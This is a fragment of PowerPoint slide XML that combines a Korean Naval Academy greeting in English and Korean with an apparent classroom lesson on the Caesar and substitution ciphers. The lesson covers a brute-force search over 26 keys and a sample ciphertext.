              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>of Korea </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>in all parts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>world.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Like the adage that those who rule the sea dominate the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>world</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, we will meet the expectations of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>nation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>and the people </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>nurturing talented people who protect the sea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, which is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>our place </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>of living </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>and the channel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>national prosperity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>We </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>look forward to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>your continued interest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>and support for our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Naval Academy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. Thank you.</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해군사관학교는 해방과 함께 손원일 제독을 비롯한 해양 선각자들이 조국의 바다를 수호할 정예 해군장교를 양성하고자 개교했습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>그동안 해군사관학교가 배출한 정예 호국간성들은 조국을 위해 헌신하였으며</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>지금도 세계 각지에서 대한민국의 위상 제고를 위해 노력하고 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>바다를 지배하는 자가 세계를 지배한다는 격언처럼 우리의 생활 터전이자 국가번영의 통로인 바다를 지키는 우수한 인재를 양성하여 국가와 국민의 기대에 부응하겠습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>앞으로도 우리 해군사관학교에 대한 지속적인 관심과 성원을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>당부드립니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>감사합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="그룹 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0BC4046-C2EF-48AD-927F-0068F01DB5F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FB9C5DEF-215F-440F-83C0-3C0B002416E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8AAC51C-94E9-48DF-B046-1D601CF402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F4D1837C-2968-44F4-B44A-37127CF52E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15C781ED-09A2-46E6-A59E-1B68FF1AFB56}"/>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03272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암호의 크랙</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119109" y="1707827"/>
            <a:ext cx="7460381" cy="869790"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>키가 주어지지 않았다면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>키의 종류는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>26</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>가지</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>전사</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(brute force attack) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>공격이 가능</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="18" name="내용 개체 틀 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA58087-6548-48E3-8664-4F32022E8CD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1594416821"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3300386"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21" name="내용 개체 틀 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CABD99D2-8B77-4964-9413-505FC2480F06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4151418199"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6714461"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39" name="내용 개체 틀 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07D1D739-0040-45EA-B9E0-FC96FCCF656B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24623509"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5754051" y="2724441"/>
          <a:ext cx="373314" cy="3586668"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="373314">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>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pSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="42" name="그룹 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25A361D8-B0C6-4347-8C92-BB01B20C0B93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5166956" y="2883489"/>
            <a:ext cx="1547505" cy="0"/>
            <a:chOff x="5166956" y="2686639"/>
            <a:chExt cx="1547505" cy="0"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="40" name="직선 화살표 연결선 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31C1E213-DCA2-4FEA-899B-847785F56CE7}"/>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D1B4D4DD-ECCA-4E22-B317-AEE3112FCBE5}"/>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그룹 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63AD345A-2D1F-4A97-87B5-A6FCC072B44A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5166956" y="3167864"/>
            <a:ext cx="1547505" cy="0"/>
            <a:chOff x="5166956" y="2686639"/>
            <a:chExt cx="1547505" cy="0"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="46" name="직선 화살표 연결선 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{270C82C1-3523-4399-A5A9-62B523374592}"/>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FB57D83-2295-4D8F-8440-77A233BC7B0A}"/>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그룹 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2556AA4F-4302-49DC-907F-E47D6FF41DB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5166956" y="3489946"/>
            <a:ext cx="1547505" cy="0"/>
            <a:chOff x="5166956" y="2686639"/>
            <a:chExt cx="1547505" cy="0"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="49" name="직선 화살표 연결선 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{450109A4-7E9D-4A2F-855C-82A3E7907F65}"/>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39C286E-4C18-4504-A622-DF5EC73748D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id="{78FDB869-7C2D-4C2D-8CAD-284D471902F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5166955" y="3783748"/>
            <a:ext cx="1547505" cy="0"/>
            <a:chOff x="5166956" y="2686639"/>
            <a:chExt cx="1547505" cy="0"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="52" name="직선 화살표 연결선 51">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BA52078-B998-4699-8F26-C51C89C188AE}"/>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7ACF5AE2-0436-480A-8355-BE565DCC13BF}"/>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그룹 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06BA1347-9919-4876-AE1A-9AEEDBE37803}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5169785" y="4077550"/>
            <a:ext cx="1547505" cy="0"/>
            <a:chOff x="5166956" y="2686639"/>
            <a:chExt cx="1547505" cy="0"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="55" name="직선 화살표 연결선 54">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70EDD42F-F6CB-4793-998C-20EF0F25974D}"/>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1AC6CBAE-2455-4981-B676-A6AD461DB4F2}"/>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7" name="그룹 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82391D9A-BE7E-44C0-8A8C-97050E0838A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5166955" y="4380779"/>
            <a:ext cx="1547505" cy="0"/>
            <a:chOff x="5166956" y="2686639"/>
            <a:chExt cx="1547505" cy="0"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="58" name="직선 화살표 연결선 57">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B32822A-2C9E-459D-AED6-DDA408A5BAF4}"/>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BBB3A373-A749-41EC-90C4-1A6387AC55AB}"/>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그룹 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AC1D88D-69C2-40DF-A9C2-C4F4DF28A841}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5166955" y="5570127"/>
            <a:ext cx="1547505" cy="0"/>
            <a:chOff x="5166956" y="2686639"/>
            <a:chExt cx="1547505" cy="0"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="61" name="직선 화살표 연결선 60">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47E61A01-BDA1-41A5-AF93-69F78656E34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4DB924FC-D4A0-4460-B25A-8D922EDEC21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그룹 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6635651D-A014-4F19-83A7-F01AC5526B5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5166955" y="5863929"/>
            <a:ext cx="1547505" cy="0"/>
            <a:chOff x="5166956" y="2686639"/>
            <a:chExt cx="1547505" cy="0"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="64" name="직선 화살표 연결선 63">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E32ED8C5-AB3B-40C5-907E-4FD4DCA1C63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AA82DFF-DA8C-4521-897E-9507EFD34493}"/>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6" name="그룹 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{174EF234-F01C-48A6-BBBE-662FE1B74C88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5166955" y="6148304"/>
            <a:ext cx="1547505" cy="0"/>
            <a:chOff x="5166956" y="2686639"/>
            <a:chExt cx="1547505" cy="0"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="67" name="직선 화살표 연결선 66">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1BB3252-6765-4305-80CA-0BEBCCF885BF}"/>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AB793A53-851A-4300-87A8-8F8B48429621}"/>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5" name="그룹 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B930A054-CAF1-4FA3-88C9-20E2EE5B7AEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="사각형: 둥근 모서리 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DE86D2A-7262-42B6-A2C3-6D94ECFA5A5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FCD553AD-A17A-4AF7-9570-7D2A85D94C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8" name="화살표: 오른쪽 37">
              <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2230B6A2-6049-4385-BCA4-09E14B20656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1" name="화살표: 오른쪽 40">
            <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9BF070A-2379-490A-8B0D-2EA886A7C1B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3451697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2</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더 깊은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그러나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여기엔 키 값을 알 수 없었다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암호문을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5CBC0565-1C65-4120-8B7A-725E042BB1D7}"/>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5B14A78-8A8C-434A-BD7F-8D3DFDEB8A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C0121E15-F698-4855-99BC-F5411F4598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1E4BCE6A-6B25-46F7-80DC-F038CD9C36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13DB0223-A4A5-400C-AC8D-7DC7963E3A9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8284888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HMALY YLJLPCPUN HU VYKLY MYVT AOL ZLUHAL AV KPZTHUASL HSS VM AOL JVYWZ PU NHBS HUK HWWLHY PU YVTL, OL SLK AOL JVYWZ AV JYVZZ AOL YBIPJVU YPCLY. HA AOL APTL, AOL YBIPJVU YPCLY DHZ AOL IVYKLY ILADLLU YVTL HUK AOL WYVCPUJLZ, HUK PA DHZ UVA HSSVDLK AV JYVZZ AOL YPCLY DPAO AYVVWZ. JHLZHY ZHPK OPZ KPJL DLYL AOYVDU HZ OL JYVZZLK AOPZ YPCLY.</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7585180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C93091A-D269-4306-9719-5B8447907AF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DA6DC6FB-0574-4097-9441-955FEE7746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BCC79D8-AA42-4B36-8D34-D09729AFDF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0827CA1B-DC6E-426D-8F7F-307F37AC897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363044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a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12290" name="Picture 2" descr="Python] 단일 치환 암호">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60453566-AB3B-40FD-B663-46330915F0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7757" y="1788785"/>
            <a:ext cx="7580826" cy="328043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93961392-74FC-47BE-B204-55727A129DE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1925325" y="3285282"/>
            <a:ext cx="1272207" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>암호화</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="TextBox 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7C4E9CF-E6F3-4CB9-8D60-5F07EC9982B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1417601" y="3654614"/>
            <a:ext cx="2130156"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TXGGO</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="직선 연결선 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8458D368-1A0E-49AE-8480-BF5AE2F0D683}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5788058" y="2433932"/>
            <a:ext cx="3280528"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9D03EC99-E87C-43EF-B87D-78AD4877EFC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4949072" y="2433932"/>
            <a:ext cx="524130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D44FC1C0-809A-4C10-8F78-6D69572914BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5505254" y="2433932"/>
            <a:ext cx="137631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9C7D4CBE-55E6-42FA-A6C4-531170CE58B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4119514" y="2433932"/>
            <a:ext cx="361989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0055322E-DDC8-433C-B1A2-8FA66B2833AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
